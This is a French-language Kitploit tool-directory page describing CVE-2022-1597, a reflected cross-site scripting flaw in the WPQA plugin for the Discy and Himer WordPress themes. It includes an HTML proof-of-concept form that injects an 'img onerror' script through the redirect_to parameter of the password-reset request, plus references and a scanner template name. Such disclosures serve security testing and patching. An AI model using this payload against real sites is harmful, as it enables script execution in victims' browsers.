Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1597 — Le plugin, utilisé comme un compagnon pour les thèmes Discy et Himer, ne nettoie ni n'échappe un paramètre dans son formulaire de réinitialisation de mot de passe, ce qui permet de réaliser des attaques de type Cross-Site Scripting réfléchi. | Kitploit
Outils/GitHubGitHub/v35hr4j/cve-2022-1597
Outils de PhishingScanners de Vulnérabilités WebAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubv35hr4j/cve-2022-1597

CVE-2022-1597

Le plugin, utilisé comme un compagnon pour les thèmes Discy et Himer, ne nettoie ni n'échappe un paramètre dans son formulaire de réinitialisation de mot de passe, ce qui permet de réaliser des attaques de type Cross-Site Scripting réfléchi.

Voir le dépôt
4151il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1597

Le plugin, utilisé comme compagnon pour les thèmes Discy et Himer, ne nettoie ni n'échappe un paramètre sur son formulaire de réinitialisation de mot de passe, ce qui permet des attaques de type Cross-Site Scripting Réfléchi (Reflected XSS).

Plugins concernés :

WPQA < 5.4

Thèmes concernés :

DISCY

HIMER

POC :

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="user&#95;mail" value="[email protected]" />
      <input type="hidden" name="form&#95;type" value="wpqa&#95;forget" />
      <input type="hidden" name="action" value="wpqa&#95;ajax&#95;password&#95;process" />
      <input type="hidden" name="redirect&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Modèle Nuclei :

CVE-2022-1597.yaml

NUCLEI

VIDÉO POC :

https://www.youtube.com/watch?v=E2GRtf6prq8

Références :

https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597

Télécharger l’outil